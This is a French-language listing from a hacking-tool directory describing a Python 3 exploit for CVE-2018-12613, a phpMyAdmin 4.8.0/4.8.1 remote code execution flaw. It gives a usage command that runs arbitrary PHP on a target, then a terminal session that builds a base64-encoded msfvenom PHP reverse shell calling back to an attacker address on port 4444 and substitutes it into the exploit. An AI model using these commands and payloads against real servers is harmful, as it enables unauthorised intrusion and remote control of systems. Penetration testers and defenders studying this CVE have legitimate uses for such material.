Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-12613 — Exploit autonome modifié porté pour Python 3 | Kitploit
Outils/GitHubGitHub/ivanitlearning/cve-2018-12613
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubivanitlearning/cve-2018-12613

CVE-2018-12613

Exploit autonome modifié porté pour Python 3

Voir le dépôt
4il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-12613

Exploit autonome modifié porté en Python 3. Testé sur Python 3.7.3, phpMyAdmin 4.8.1 tournant sur Ubuntu 16.04 Fonctionne uniquement sous Linux. Exploit original par SSD. Tout le crédit leur revient.

Modifications apportées

  1. Ajout d'une fonction pour arrêter si le nom d'utilisateur/mot de passe phpMyAdmin fourni est correct
  2. Ajout d'une fonction pour vérifier si la version est vulnérable (4.8.0 ou 4.8.1)
  3. Conversion stricte des variables en bytes ou en chaînes ; Python 3 interdit le mélange. Voir ceci.

Utilisation :

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”

Résultats du code PHP stockés dans results.html

Pour un reverse shell

root@kitploit:~
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

Utilisez le payload PHP de msfvenom à la place de phpcredits(); ci-dessus

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));

Télécharger l’outil